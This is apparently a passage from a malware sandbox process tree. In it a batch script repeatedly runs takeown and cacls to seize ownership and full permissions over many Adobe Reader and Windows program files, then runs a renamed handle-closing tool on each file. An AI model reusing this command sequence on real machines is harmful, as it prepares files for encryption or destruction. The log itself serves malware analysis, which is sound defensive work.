    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:2860
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:1068
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2848
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2884
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:2896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2948
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2868
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2064
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2112
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:2148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:2888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:2780
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:3028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:3032
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""
  2⤵
  PID:308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:2208
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:2236
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui""
  2⤵
  PID:2296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui"
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:2372
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:2264
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""
  2⤵
  PID:2556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui"
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:2524
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:2344
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui""
  2⤵
  PID:2348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui"
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:2340
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:2480
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "blank.jtp" -nobanner
    3⤵
    PID:2512
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "blank.jtp" -nobanner
      4⤵
      PID:2700
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "To_Do_List.jtp" -nobanner
    3⤵
    PID:2792
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "To_Do_List.jtp" -nobanner
      4⤵
      PID:428
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:468
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2828
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1280
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2812
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:2912
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:2060
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:888
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:2892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:2872
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:3060
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:2152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:3068
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:2088
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:2100
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    - Modifies file permissions
    PID:2096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:2168
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:1996
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:2188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:2416
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:2300
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:2380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:2452
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:2432
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:2440
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:2548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:2736
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:2640
